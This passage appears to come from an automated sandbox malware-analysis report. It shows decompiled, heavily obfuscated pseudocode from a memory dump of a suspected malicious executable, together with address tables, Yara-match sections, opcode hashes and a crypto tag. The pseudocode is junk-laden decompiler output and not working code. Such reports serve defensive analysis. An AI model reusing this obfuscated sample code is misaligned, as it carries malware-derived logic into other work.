											_pop(_t114);
											asm("rcr byte [0xddb5091a], 0xf7");
											 *0x32130a81 =  *0x32130a81 ^ _t57;
											_push(_t79);
											 *0xd58dad29 =  *0xd58dad29 << 0x12;
											_t65 = _t65 | 0x000000c9;
											 *0x8b17fbd3 =  *0x8b17fbd3 ^ _t114;
											_t94 = 0x3ca9198c +  *0x78c8c6b * 0x6a2d;
											_t79 = _t79 |  *0xcc18940d;
											if(_t79 == 0) {
												_t74 = _t65 + 1;
												 *0xbeb4ecd9 =  *0xbeb4ecd9 | _t74;
												 *0xbadafdf1 =  *0xbadafdf1 - 0x1fa92a7b;
												asm("stosd");
												asm("adc eax, [0x6dfe923d]");
												_t75 = _t74 ^ 0x00000022;
												asm("sbb ebx, [0x6b290011]");
												_t62 = _t57 +  *0x12839d1b;
												asm("stosd");
												_push(_t114);
												 *0x87312133 =  *0x87312133 + _t75;
												asm("adc [0x2b898fd5], esp");
												_push(_t62);
												 *0xb5bbdf0 =  *0xb5bbdf0 << 0xab;
												asm("sbb [0x5d343a3a], cl");
												 *0xcbecf632 =  *0xcbecf632 >> 0x65;
												 *0x2200f0c2 = 0x1fa92a7b;
												asm("rol byte [0x807a8838], 0x94");
												 *0x4b465516 =  *0x4b465516 << 0x4f;
												L1();
												_t85 =  *0x72eba03a;
												 *0x72eba03a =  *0xa7973af6;
												asm("sbb [0x336c880], bl");
												 *0xfd16fad2 =  *0xfd16fad2 + _t85;
												asm("sbb ebp, [0x654c663d]");
												_t65 = _t75 +  *0x6e788fec +  *0xe2732ccf - 1;
												 *0xbf02c004 =  *0xbf02c004 >> 0x47;
												asm("adc bh, [0xef8be9e3]");
												 *0x7192db2c =  *0x7192db2c << 0x48;
												_t112 = _t62;
												_t63 = _t62 ^  *0x7c1bd46c;
												_t114 = _t114 -  *0x6da73287 -  *0x64cda393;
												asm("adc ch, 0xe4");
												asm("sbb ecx, [0x11a8c467]");
												asm("adc [0xb11a7100], cl");
												 *0xe7269de1 =  *0xe7269de1 ^ _t63;
												_t25 = _t94 +  *0xa03fbd2f &  *0x523d0003;
												_t94 =  *0x79da4885;
												 *0x79da4885 = _t25;
												asm("rol dword [0x80276d9], 0xda");
												asm("rcr byte [0xeca4ffe0], 0x14");
												_push(_t112);
												_t113 = _t112 - 0xafb167eb;
												 *0x437ef68c =  *0x437ef68c << 0x98;
												_push(_t90);
												 *0x9817efb =  *0x9817efb >> 0x55;
												 *0x224475f8 =  *0xbe3eb26b * 0xc0d6;
												_push(_t113);
												_t57 = _t63 - 0xf9 -  *0x996081d2;
												asm("adc edi, [0x99053409]");
												_t101 = _t113 &  *0xdfdf02cc;
												 *0x19eed505 =  *0x19eed505 | 0x1fa92a7b;
												 *0xd505dfe7 = _t65;
												_t79 = _t85 ^  *0xbff0400b |  *0xdff43102;
												 *0x77c5b905 =  *0x77c5b905 << 0x2d;
												_t47 =  *0x224475f8 |  *0xad05dfe0;
												 *0xdfde73ba =  *0xdfde73ba << 6;
												 *0xac03dfee =  *0xac03dfee ^ _t47;
												if( *0x9a044024 > _t57) {
													asm("sbb esi, 0x444b1bb");
													 *0x44abc90c =  *0x44abc90c << 0x6f;
													_t114 = _t114 + 1;
													 *0xe605dffa =  *0xe605dffa | _t114;
													asm("adc bl, 0x32");
													_t94 = _t94 +  *0xf232082f;
													asm("adc ecx, [0x42e007df]");
													asm("sbb ebx, [0x5e711207]");
													 *0x1a45376f = 0x1fa92a7b;
													 *0x15d92807 =  *0x15d92807 & 0x1fa92a7b;
													_t45 = _t47 +  *0xa9c87704 - 1 +  *0x1a47426c;
													_t47 =  *0x81a5308;
													 *0x81a5308 = _t45;
													_t65 = 0xc;
													_push(0xc);
													_push(_t94);
													 *0xdb5e9cde =  *0xdb5e9cde + _t47;
													asm("sbb ebp, [0x4854868]");
													_t57 = _t57 ^  *0x414b008;
													asm("adc ah, [0x7017161a]");
													asm("sbb [0xd40e0804], dh");
													_t101 =  *0x3454c966;
													if(_t57 < 0) {
														asm("sbb eax, [0x51090479]");
														 *0xc12f572a =  *0xc12f572a >> 0xdf;
														asm("lodsd");
														asm("rol byte [0x816a24e5], 0x26");
														_t89 =  *0x3aca5609;
														_t57 =  *0x7941f960 * 0xa81;
														asm("adc bh, 0xca");
														asm("adc dl, 0xf2");
														_t79 = _t89 |  *0xad1c282d;
														asm("sbb ebx, [0xfbdaf411]");
														_pop( *0x458fc10b);
														asm("lodsd");
														 *0x9569553b =  *0x9569553b ^ _t90;
													}
												}
											}
										}
									}
								}
							}
						}
					}
				}
				goto L1;
			}























                                                        0x0041c089
                                                        0x0041c089
                                                        0x0041c089
                                                        0x0041c089
                                                        0x0041c08e
                                                        0x0041c094
                                                        0x0041c09a
                                                        0x0041c0a0
                                                        0x0041c0a1
                                                        0x0041c0a2
                                                        0x0041c0a8
                                                        0x0041c0a9
                                                        0x0041c0af
                                                        0x0041c0b5
                                                        0x0041c0b5
                                                        0x0041b496
                                                        0x0041b496
                                                        0x0041b4af
                                                        0x0041b4b0
                                                        0x0041b4bc
                                                        0x0041b4d1
                                                        0x0041b4d8
                                                        0x0041b4e1
                                                        0x0041b4e8
                                                        0x0041b4ee
                                                        0x0041b4ef
                                                        0x0041b4f1
                                                        0x0041b4f7
                                                        0x0041b504
                                                        0x0041b50a
                                                        0x0041b50b
                                                        0x0041b518
                                                        0x0041b52a
                                                        0x0041b52b
                                                        0x0041b531
                                                        0x0041b53d
                                                        0x0041b543
                                                        0x0041b54a
                                                        0x0041b550
                                                        0x0041b556
                                                        0x0041b562
                                                        0x0041b56f
                                                        0x0041b575
                                                        0x0041b581
                                                        0x0041b587
                                                        0x0041b58e
                                                        0x0041b5a3
                                                        0x0041b5af
                                                        0x0041b5b6
                                                        0x0041b5c0
                                                        0x0041b5c7
                                                        0x0041b5cd
                                                        0x0041b5d4
                                                        0x0041b5d4
                                                        0x0041b5da
                                                        0x0041b5e0
                                                        0x0041b5e6
                                                        0x0041b5ec
                                                        0x0041b5f2
                                                        0x0041b5f5
                                                        0x0041b5fb
                                                        0x0041b604
                                                        0x0041b60a
                                                        0x0041b610
                                                        0x0041b610
                                                        0x0041b616
                                                        0x0041b61c
                                                        0x0041b622
                                                        0x0041b628
                                                        0x0041b62e
                                                        0x0041b638
                                                        0x0041b63e
                                                        0x0041b651
                                                        0x0041b658
                                                        0x0041b665
                                                        0x0041b666
                                                        0x0041b66d
                                                        0x0041b673
                                                        0x0041b679
                                                        0x0041b690
                                                        0x0041b693
                                                        0x0041b699
                                                        0x0041b69a
                                                        0x0041b6a4
                                                        0x0041b6a4
                                                        0x0041b6aa
                                                        0x0041b6b4
                                                        0x0041b6ba
                                                        0x0041b6c0
                                                        0x0041b6c6
                                                        0x0041b6cc
                                                        0x0041b6d2
                                                        0x0041b6d8
                                                        0x0041b6de
                                                        0x0041b6e4
                                                        0x0041b6ea
                                                        0x0041b6f1
                                                        0x0041b6f7
                                                        0x0041b6fb
                                                        0x0041b701
                                                        0x0041b707
                                                        0x0041b70d
                                                        0x0041b713
                                                        0x0041b71a
                                                        0x0041b720
                                                        0x0041b72a
                                                        0x0041b730
                                                        0x0041b731
                                                        0x0041b73e
                                                        0x0041b745
                                                        0x0041b74b
                                                        0x0041b74e
                                                        0x0041b755
                                                        0x0041b758
                                                        0x0041b75e
                                                        0x0041b764
                                                        0x0041b76a
                                                        0x0041b772
                                                        0x0041b779
                                                        0x0041b780
                                                        0x0041b78c
                                                        0x0041b792
                                                        0x0041b798
                                                        0x0041b79e
                                                        0x0041b7a4
                                                        0x0041b7b0
                                                        0x0041b7b6
                                                        0x0041b7c2
                                                        0x0041b7c8
                                                        0x0041b7c8
                                                        0x0041b7c8
                                                        0x0041b7ce
                                                        0x0041b7cf
                                                        0x0041b7e0
                                                        0x0041b7e6
                                                        0x0041b7e7
                                                        0x0041b7ee
                                                        0x0041b7f1
                                                        0x0041b7f7
                                                        0x0041b7fd
                                                        0x0041b803
                                                        0x0041b80e
                                                        0x0041b821
                                                        0x0041b827
                                                        0x0041b82d
                                                        0x0041b834
                                                        0x0041b83a
                                                        0x0041b83d
                                                        0x0041b843
                                                        0x0041b849
                                                        0x0041b84a
                                                        0x0041b84b
                                                        0x0041b851
                                                        0x0041b857
                                                        0x0041b858
                                                        0x0041b865
                                                        0x0041b86b
                                                        0x0041b878
                                                        0x0041b87e
                                                        0x0041b88b
                                                        0x0041b899
                                                        0x0041b8a4
                                                        0x0041b8a4
                                                        0x0041b8ab
                                                        0x0041b8b1
                                                        0x0041b8b7
                                                        0x0041b8ce
                                                        0x0041b8cf
                                                        0x0041b8d6
                                                        0x0041b8dc
                                                        0x0041b8e3
                                                        0x0041b8e4
                                                        0x0041b8f3
                                                        0x0041b8f9
                                                        0x0041b8fc
                                                        0x0041b908
                                                        0x0041b90e
                                                        0x0041b914
                                                        0x0041b914
                                                        0x0041b914
                                                        0x0041b92a
                                                        0x0041b93a
                                                        0x0041b947
                                                        0x0041b948
                                                        0x0041b94e
                                                        0x0041b955
                                                        0x0041b956
                                                        0x0041b95d
                                                        0x0041b97e
                                                        0x0041b97f
                                                        0x0041b985
                                                        0x0041b98b
                                                        0x0041b991
                                                        0x0041b997
                                                        0x0041b99d
                                                        0x0041b9a3
                                                        0x0041b9aa
                                                        0x0041b9b0
                                                        0x0041b9bd
                                                        0x0041b9c9
                                                        0x0041b9d6
                                                        0x0041b9dc
                                                        0x0041b9e9
                                                        0x0041b9f0
                                                        0x0041b9f6
                                                        0x0041b9ff
                                                        0x0041ba05
                                                        0x0041ba12
                                                        0x0041ba18
                                                        0x0041ba2a
                                                        0x0041ba33
                                                        0x0041ba33
                                                        0x0041ba33
                                                        0x0041ba3a
                                                        0x0041ba3c
                                                        0x0041ba3d
                                                        0x0041ba47
                                                        0x0041ba4d
                                                        0x0041ba53
                                                        0x0041ba59
                                                        0x0041ba5f
                                                        0x0041ba65
                                                        0x0041ba6b
                                                        0x0041ba71
                                                        0x0041ba77
                                                        0x0041ba7e
                                                        0x0041ba8c
                                                        0x0041ba99
                                                        0x0041ba9a
                                                        0x0041baa4
                                                        0x0041baa7
                                                        0x0041baaa
                                                        0x0041bab0
                                                        0x0041bab6
                                                        0x0041babc
                                                        0x0041babd
                                                        0x0041babd
                                                        0x0041ba6b
                                                        0x0041b9c9
                                                        0x0041b803
                                                        0x0041b79e
                                                        0x0041b6cc
                                                        0x0041b638
                                                        0x0041b628
                                                        0x0041b616
                                                        0x0041b5f5
                                                        0x00000000

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.373559944.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 59cdac5d4c2111e706fca52a9ca6b907bfe00cd70a0542016cd7e378ac73947c
                                                        • Instruction ID: 4edd799170bb840544fa628a4c2260284ffa4c02ac4963203c3b90a96eb2f434
                                                        • Opcode Fuzzy Hash: 59cdac5d4c2111e706fca52a9ca6b907bfe00cd70a0542016cd7e378ac73947c
                                                        • Instruction Fuzzy Hash: 0AF194329483C5CFE706DF38D99AB923FB5F346320B08829EC9A153592E3792559CF85
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0041B493, Relevance: .3, Instructions: 305COMMONCrypto
                                                        Download Yara Rule
                                                        C-Code - Quality: 48%
                                                        			E0041B493(void* _a392989946, char _a1347328017, void* _a1362062178) {
				void* _v5;
				intOrPtr _t46;
				signed int _t47;
				signed char _t48;
				intOrPtr _t50;
				signed int _t57;
				signed int _t61;
				void* _t64;
				signed char _t66;
				void* _t68;
				signed char _t69;
				signed int _t70;
				signed int _t71;
				signed int _t72;
				signed char _t73;
				signed char _t75;
				intOrPtr _t83;
				signed int _t84;
				intOrPtr _t86;
				signed char _t87;
				signed char _t90;
				signed char _t91;
				signed char _t92;
				signed char _t93;
				signed int _t98;
				signed char _t101;
				signed int _t103;
				signed int _t105;
				signed int _t114;
				signed int _t115;
				signed int _t120;
				signed int _t121;
				void* _t130;
				signed int _t133;
				signed int _t144;
				void* _t149;
				signed int _t153;
				void* _t155;
				signed int _t156;
				signed int _t157;
				signed int _t159;
				void* _t161;
				intOrPtr _t173;

				L1:
				asm("adc [0xa1201009], eax");
				asm("lodsb");
				asm("adc esi, [0x41fcfdee]");
				 *0x2966e1a0 =  *0x2966e1a0 >> 0xfc;
				asm("rol dword [0x60b61e96], 0x63");
				_t47 = _t46 + 0x63;
				asm("sbb eax, [0xc377e319]");
				_t64 = (_t61 + 0x00000001 &  *0x8e8886d) + 1;
				asm("movsw");
				asm("adc edi, 0xb04da4b8");
				_pop(_t117);
				 *0xd0ce8b85 =  *0xd0ce8b85 >> 0x14;
				 *0x52211e10 =  *0x52211e10 + _t64;
				_t155 = (_t153 |  *0x100c626d) - 1;
				asm("adc cl, [0x22c6a80a]");
				_t101 = _t98 + 0x00000001 ^ 0x689e1362 | 0x09fb999c;
				 *0x5c780ce6 =  *0x5c780ce6 >> 0x8f;
				if( *0x5c780ce6 >= 0) {
					_pop( *0x28ccce70);
					_t156 = _t155 +  *0x3430581;
					asm("stosd");
					_push( *0x1cef0afb);
					 *0x5fd7d6b2 =  *0x5fd7d6b2 & _t101;
					 *0x863362d5 =  *0x863362d5 >> 0x4d;
					 *0xbe3382ce =  *0xbe3382ce + _t64;
					asm("stosd");
					asm("rcl dword [0x2a6b2b1d], 0x39");
					 *0xefd7bf3c =  *0xefd7bf3c >> 7;
					 *0x86eb06a2 =  *0x86eb06a2 | _t101;
					 *0xa87013d3 =  *0xa87013d3 << 0x3e;
					_t83 =  *0x5103cce3;
					 *0x5103cce3 = (0xfb627fd6 |  *0x4ac6be16) - 0xe5;
					asm("adc esi, 0x991d8fec");
					asm("sbb esp, [0xfe80e711]");
					_t66 = _t64 -  *0xc90fefcb ^  *0x6335c8f7;
					 *0x2418b3b =  *0x2418b3b ^ _t47;
					asm("adc bl, 0xe1");
					if( *0x2418b3b > 0) {
						asm("sbb eax, [0x3bc21576]");
						_t68 = (_t66 & 0x000000b4) - 0x62266691;
						 *0x5457e8b7 =  *0x5457e8b7 - _t83;
						_t173 =  *0x5457e8b7;
						if(_t173 <= 0) {
							asm("adc esp, [0xfd9c7577]");
							_push( *0x26daa109);
							if(_t173 >= 0) {
								_t84 =  *0x7252dc7c * 0x4e84;
								if(_t84 == 0) {
									 *0xbe597375 = _t84;
									asm("lodsd");
									 *0xb34e9004 =  *0xb34e9004 << 0x37;
									_pop(_t86);
									 *0x86f2bb0a =  *0x86f2bb0a >> 0x95;
									 *0x5b854ad3 =  *0x5b854ad3 | _t47;
									_t144 =  &_a392989946 |  *0x6d7c473d;
									asm("ror byte [0x1712b5e4], 0x23");
									asm("sbb ah, 0x86");
									_t48 = _t47 |  *0x2c7e2e16;
									_pop(_t120);
									_t87 =  *0x6d7536c9;
									 *0x6d7536c9 = _t86;
									_t103 =  *0x16e93069 * 0x7daf;
									_t121 = _t120 |  *0x3d23f50b;
									_t157 = _t156 |  *0x191be4f4;
									_t69 = _t68 -  *0xed22ebe0;
									asm("sbb ebp, 0x9c58a56d");
									if(_t69 < 0) {
										asm("adc esi, [0xec973479]");
										 *0xb0ae5d39 =  *0xb0ae5d39 - _t157;
										 *0x20edfae3 =  *0x20edfae3 + _t69;
										asm("sbb [0x9bb3b1b7], cl");
										 *0x50983c9 =  *0x50983c9 >> 0x82;
										asm("cmpsb");
										 *0x480b8167 =  *0x480b8167 | _t87 ^ 0x00000000;
										 *0xb336e120 =  *0xb336e120 | _t48;
										asm("adc esi, [0xabc3d18f]");
										asm("adc esp, [0x290bfdd5]");
										 *0xa6eb8bde =  *0xa6eb8bde << 0xde;
										asm("rcr dword [0x230efdd5], 0xdd");
										 *0x16a30e31 =  *0x16a30e31 ^ (_t144 | 0x1c1afb96);
										_t115 = _t121 + 1;
										 *0xb6243188 =  *0xb6243188 >> 0x6c;
										asm("rcl byte [0x33aef908], 0x68");
										 *0x5f8b9937 =  *0x5f8b9937 ^ _t103;
										asm("sbb dl, 0x34");
										 *0x2c5e4014 =  *0x2c5e4014 << 0x3f;
										asm("adc dh, 0x12");
										_t70 = _t69 &  *0x8c59df12;
										 *0xdd22dc86 =  *0xdd22dc86 ^ _t70;
										_t90 =  *0x2b2c9acf;
										asm("rol byte [0xbda624f2], 0xd6");
										asm("rcr dword [0xa3ea121d], 0x97");
										_t105 = _t103 - 0x00000001 ^ 0x9ea3db3d;
										_t50 = (_t48 ^ 0x0000000a) +  *0xd1d4bca;
										asm("sbb eax, [0x73e36f0d]");
										asm("adc esi, 0xa4a34cc0");
										if(_t50 < 0) {
											asm("adc edi, [0x4a861273]");
											_t71 = _t70 ^ 0xa3b931cb;
											 *0x64814b10 =  *0x64814b10 - _t105;
											 *0x7f3777a0 = _t50;
											_pop(_t159);
											asm("rcr byte [0xddb5091a], 0xf7");
											 *0x32130a81 =  *0x32130a81 ^ _t71;
											_push(_t105);
											 *0xd58dad29 =  *0xd58dad29 << 0x12;
											_t91 = _t90 | 0x000000c9;
											 *0x8b17fbd3 =  *0x8b17fbd3 ^ _t159;
											_t130 = 0x3ca9198c +  *0x78c8c6b * 0x6a2d;
											if((_t105 |  *0xcc18940d) == 0) {
												_t92 = _t91 + 1;
												 *0xbeb4ecd9 =  *0xbeb4ecd9 | _t92;
												 *0xbadafdf1 =  *0xbadafdf1 - 0x1fa92a7b;
												asm("stosd");
												asm("adc eax, [0x6dfe923d]");
												_t93 = _t92 ^ 0x00000022;
												asm("sbb ebx, [0x6b290011]");
												_t72 = _t71 +  *0x12839d1b;
												asm("stosd");
												_push(_t159);
												 *0x87312133 =  *0x87312133 + _t93;
												asm("adc [0x2b898fd5], esp");
												_push(_t72);
												 *0xb5bbdf0 =  *0xb5bbdf0 << 0xab;
												asm("sbb [0x5d343a3a], cl");
												 *0xcbecf632 =  *0xcbecf632 >> 0x65;
												 *0x2200f0c2 = 0x1fa92a7b;
												asm("rol byte [0x807a8838], 0x94");
												 *0x4b465516 =  *0x4b465516 << 0x4f;
												L1();
												 *0x72eba03a =  *0xa7973af6;
												asm("sbb [0x336c880], bl");
												 *0xfd16fad2 =  *0xfd16fad2 +  *0x72eba03a;
												asm("sbb ebp, [0x654c663d]");
												 *0xbf02c004 =  *0xbf02c004 >> 0x47;
												asm("adc bh, [0xef8be9e3]");
												 *0x7192db2c =  *0x7192db2c << 0x48;
												_t149 = _t72;
												_t73 = _t72 ^  *0x7c1bd46c;
												_t161 = _t159 -  *0x6da73287 -  *0x64cda393;
												asm("adc ch, 0xe4");
												asm("sbb ecx, [0x11a8c467]");
												asm("adc [0xb11a7100], cl");
												 *0xe7269de1 =  *0xe7269de1 ^ _t73;
												_t133 =  *0x79da4885;
												 *0x79da4885 = _t130 +  *0xa03fbd2f &  *0x523d0003;
												asm("rol dword [0x80276d9], 0xda");
												asm("rcr byte [0xeca4ffe0], 0x14");
												_push(_t149);
												 *0x437ef68c =  *0x437ef68c << 0x98;
												_push(_t115);
												 *0x9817efb =  *0x9817efb >> 0x55;
												 *0x224475f8 =  *0xbe3eb26b * 0xc0d6;
												_push( &_a1347328017);
												_t75 = _t73 - 0xf9 -  *0x996081d2;
												asm("adc edi, [0x99053409]");
												 *0x19eed505 =  *0x19eed505 | 0x1fa92a7b;
												 *0xd505dfe7 = _t93 +  *0x6e788fec +  *0xe2732ccf - 1;
												 *0x77c5b905 =  *0x77c5b905 << 0x2d;
												_t57 =  *0x224475f8 |  *0xad05dfe0;
												 *0xdfde73ba =  *0xdfde73ba << 6;
												 *0xac03dfee =  *0xac03dfee ^ _t57;
												if( *0x9a044024 > _t75) {
													asm("sbb esi, 0x444b1bb");
													 *0x44abc90c =  *0x44abc90c << 0x6f;
													_t153 = _t161 + 1;
													 *0xe605dffa =  *0xe605dffa | _t153;
													asm("adc bl, 0x32");
													asm("adc ecx, [0x42e007df]");
													asm("sbb ebx, [0x5e711207]");
													 *0x1a45376f = 0x1fa92a7b;
													 *0x15d92807 =  *0x15d92807 & 0x1fa92a7b;
													_t46 =  *0x81a5308;
													 *0x81a5308 = _t57 +  *0xa9c87704 - 1 +  *0x1a47426c;
													_push(0xc);
													_push(_t133 +  *0xf232082f);
													 *0xdb5e9cde =  *0xdb5e9cde + _t46;
													asm("sbb ebp, [0x4854868]");
													asm("adc ah, [0x7017161a]");
													asm("sbb [0xd40e0804], dh");
													if((_t75 ^  *0x414b008) < 0) {
														asm("sbb eax, [0x51090479]");
														 *0xc12f572a =  *0xc12f572a >> 0xdf;
														asm("lodsd");
														asm("rol byte [0x816a24e5], 0x26");
														_t114 =  *0x3aca5609;
														_t61 =  *0x7941f960 * 0xa81;
														asm("adc bh, 0xca");
														asm("adc dl, 0xf2");
														_t98 = _t114 |  *0xad1c282d;
														asm("sbb ebx, [0xfbdaf411]");
														_pop( *0x458fc10b);
														asm("lodsd");
														 *0x9569553b =  *0x9569553b ^ _t115;
													}
												}
											}
										}
									}
								}
							}
						}
					}
				}
				goto L1;
			}














































                                                        0x0041b496
                                                        0x0041b496
                                                        0x0041b4af
                                                        0x0041b4b0
                                                        0x0041b4bc
                                                        0x0041b4d1
                                                        0x0041b4d8
                                                        0x0041b4e8
                                                        0x0041b4ee
                                                        0x0041b4ef
                                                        0x0041b4f1
                                                        0x0041b4f7
                                                        0x0041b50b
                                                        0x0041b518
                                                        0x0041b52a
                                                        0x0041b531
                                                        0x0041b53d
                                                        0x0041b543
                                                        0x0041b54a
                                                        0x0041b550
                                                        0x0041b556
                                                        0x0041b562
                                                        0x0041b56f
                                                        0x0041b575
                                                        0x0041b587
                                                        0x0041b58e
                                                        0x0041b5af
                                                        0x0041b5b6
                                                        0x0041b5c0
                                                        0x0041b5c7
                                                        0x0041b5cd
                                                        0x0041b5d4
                                                        0x0041b5d4
                                                        0x0041b5da
                                                        0x0041b5e0
                                                        0x0041b5e6
                                                        0x0041b5ec
                                                        0x0041b5f2
                                                        0x0041b5f5
                                                        0x0041b5fb
                                                        0x0041b604
                                                        0x0041b610
                                                        0x0041b610
                                                        0x0041b616
                                                        0x0041b61c
                                                        0x0041b622
                                                        0x0041b628
                                                        0x0041b62e
                                                        0x0041b638
                                                        0x0041b63e
                                                        0x0041b651
                                                        0x0041b658
                                                        0x0041b665
                                                        0x0041b666
                                                        0x0041b66d
                                                        0x0041b673
                                                        0x0041b679
                                                        0x0041b690
                                                        0x0041b693
                                                        0x0041b699
                                                        0x0041b6a4
                                                        0x0041b6a4
                                                        0x0041b6aa
                                                        0x0041b6b4
                                                        0x0041b6ba
                                                        0x0041b6c0
                                                        0x0041b6c6
                                                        0x0041b6cc
                                                        0x0041b6d2
                                                        0x0041b6d8
                                                        0x0041b6de
                                                        0x0041b6e4
                                                        0x0041b6ea
                                                        0x0041b6f7
                                                        0x0041b6fb
                                                        0x0041b701
                                                        0x0041b707
                                                        0x0041b70d
                                                        0x0041b713
                                                        0x0041b720
                                                        0x0041b72a
                                                        0x0041b730
                                                        0x0041b731
                                                        0x0041b73e
                                                        0x0041b745
                                                        0x0041b74b
                                                        0x0041b74e
                                                        0x0041b755
                                                        0x0041b758
                                                        0x0041b75e
                                                        0x0041b764
                                                        0x0041b76a
                                                        0x0041b772
                                                        0x0041b780
                                                        0x0041b78c
                                                        0x0041b792
                                                        0x0041b798
                                                        0x0041b79e
                                                        0x0041b7a4
                                                        0x0041b7b0
                                                        0x0041b7b6
                                                        0x0041b7c8
                                                        0x0041b7ce
                                                        0x0041b7cf
                                                        0x0041b7e0
                                                        0x0041b7e6
                                                        0x0041b7e7
                                                        0x0041b7ee
                                                        0x0041b7f1
                                                        0x0041b7f7
                                                        0x0041b803
                                                        0x0041b80e
                                                        0x0041b821
                                                        0x0041b827
                                                        0x0041b82d
                                                        0x0041b834
                                                        0x0041b83a
                                                        0x0041b83d
                                                        0x0041b843
                                                        0x0041b849
                                                        0x0041b84a
                                                        0x0041b84b
                                                        0x0041b851
                                                        0x0041b857
                                                        0x0041b858
                                                        0x0041b865
                                                        0x0041b86b
                                                        0x0041b878
                                                        0x0041b87e
                                                        0x0041b88b
                                                        0x0041b899
                                                        0x0041b8a4
                                                        0x0041b8ab
                                                        0x0041b8b1
                                                        0x0041b8b7
                                                        0x0041b8cf
                                                        0x0041b8d6
                                                        0x0041b8dc
                                                        0x0041b8e3
                                                        0x0041b8e4
                                                        0x0041b8f3
                                                        0x0041b8f9
                                                        0x0041b8fc
                                                        0x0041b908
                                                        0x0041b90e
                                                        0x0041b914
                                                        0x0041b914
                                                        0x0041b92a
                                                        0x0041b93a
                                                        0x0041b947
                                                        0x0041b94e
                                                        0x0041b955
                                                        0x0041b956
                                                        0x0041b95d
                                                        0x0041b97e
                                                        0x0041b97f
                                                        0x0041b985
                                                        0x0041b991
                                                        0x0041b997
                                                        0x0041b9a3
                                                        0x0041b9aa
                                                        0x0041b9b0
                                                        0x0041b9bd
                                                        0x0041b9c9
                                                        0x0041b9d6
                                                        0x0041b9dc
                                                        0x0041b9e9
                                                        0x0041b9f0
                                                        0x0041b9f6
                                                        0x0041ba05
                                                        0x0041ba12
                                                        0x0041ba18
                                                        0x0041ba2a
                                                        0x0041ba33
                                                        0x0041ba33
                                                        0x0041ba3c
                                                        0x0041ba3d
                                                        0x0041ba47
                                                        0x0041ba4d
                                                        0x0041ba59
                                                        0x0041ba5f
                                                        0x0041ba6b
                                                        0x0041ba71
                                                        0x0041ba77
                                                        0x0041ba7e
                                                        0x0041ba8c
                                                        0x0041ba99
                                                        0x0041ba9a
                                                        0x0041baa4
                                                        0x0041baa7
                                                        0x0041baaa
                                                        0x0041bab0
                                                        0x0041bab6
                                                        0x0041babc
                                                        0x0041babd
                                                        0x0041babd
                                                        0x0041ba6b
                                                        0x0041b9c9
                                                        0x0041b803
                                                        0x0041b79e
                                                        0x0041b6cc
                                                        0x0041b638
                                                        0x0041b628
                                                        0x0041b616
                                                        0x0041b5f5
                                                        0x00000000

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.373559944.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 82d75e5f0f21d115ebc9a148efe61f3ff9a38673ea1efbcb2d3b27e86c18c191
                                                        • Instruction ID: 6a5d61d415fa725840bfff41da20e847ccb51c6d2fe201b0ea268966ea69b1bd
                                                        • Opcode Fuzzy Hash: 82d75e5f0f21d115ebc9a148efe61f3ff9a38673ea1efbcb2d3b27e86c18c191
                                                        • Instruction Fuzzy Hash: D7E196329483C5CFE706DF38D89AB823FB5F346320B08829EC9A153592D3792569DF85
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0041B496, Relevance: .2, Instructions: 195COMMONCrypto
                                                        Download Yara Rule
                                                        C-Code - Quality: 47%
                                                        			E0041B496() {
				void* _t46;
				signed int _t47;
				signed char _t48;
				intOrPtr _t50;
				signed int _t57;
				void* _t62;
				void* _t65;
				signed char _t67;
				void* _t69;
				signed char _t70;
				signed int _t71;
				signed int _t72;
				signed int _t73;
				signed char _t74;
				signed char _t76;
				intOrPtr _t85;
				signed int _t86;
				intOrPtr _t88;
				signed char _t89;
				signed char _t92;
				signed char _t93;
				signed char _t94;
				signed char _t95;
				void* _t101;
				signed char _t104;
				signed int _t106;
				signed int _t108;
				signed int _t124;
				signed int _t125;
				signed int _t126;
				void* _t135;
				signed int _t138;
				signed int _t149;
				signed int _t151;
				void* _t156;
				signed int _t160;
				void* _t162;
				signed int _t163;
				signed int _t164;
				signed int _t166;
				void* _t168;
				intOrPtr _t181;

				L0:
				asm("adc [0xa1201009], eax");
				asm("lodsb");
				asm("adc esi, [0x41fcfdee]");
				 *0x2966e1a0 =  *0x2966e1a0 >> 0xfc;
				asm("rol dword [0x60b61e96], 0x63");
				_t47 = _t46 + 0x63;
				asm("sbb eax, [0xc377e319]");
				_t65 = (_t62 + 0x00000001 &  *0x8e8886d) + 1;
				asm("movsw");
				asm("adc edi, 0xb04da4b8");
				_pop(_t121);
				 *0xd0ce8b85 =  *0xd0ce8b85 >> 0x14;
				 *0x52211e10 =  *0x52211e10 + _t65;
				_t162 = (_t160 |  *0x100c626d) - 1;
				asm("adc cl, [0x22c6a80a]");
				_t104 = _t101 + 0x00000001 ^ 0x689e1362 | 0x09fb999c;
				 *0x5c780ce6 =  *0x5c780ce6 >> 0x8f;
				if( *0x5c780ce6 >= 0) {
					_pop( *0x28ccce70);
					_t163 = _t162 +  *0x3430581;
					asm("stosd");
					_push( *0x1cef0afb);
					 *0x5fd7d6b2 =  *0x5fd7d6b2 & _t104;
					_t149 =  *0xe3e2139 ^  *0x4babdf0f;
					 *0x863362d5 =  *0x863362d5 >> 0x4d;
					 *0xbe3382ce =  *0xbe3382ce + _t65;
					asm("stosd");
					asm("rcl dword [0x2a6b2b1d], 0x39");
					 *0xefd7bf3c =  *0xefd7bf3c >> 7;
					 *0x86eb06a2 =  *0x86eb06a2 | _t104;
					 *0xa87013d3 =  *0xa87013d3 << 0x3e;
					_t85 =  *0x5103cce3;
					 *0x5103cce3 = (0xfb627fd6 |  *0x4ac6be16) - 0xe5;
					asm("adc esi, 0x991d8fec");
					asm("sbb esp, [0xfe80e711]");
					_t67 = _t65 -  *0xc90fefcb ^  *0x6335c8f7;
					 *0x2418b3b =  *0x2418b3b ^ _t47;
					asm("adc bl, 0xe1");
					if( *0x2418b3b > 0) {
						asm("sbb eax, [0x3bc21576]");
						_t69 = (_t67 & 0x000000b4) - 0x62266691;
						 *0x5457e8b7 =  *0x5457e8b7 - _t85;
						_t181 =  *0x5457e8b7;
						if(_t181 <= 0) {
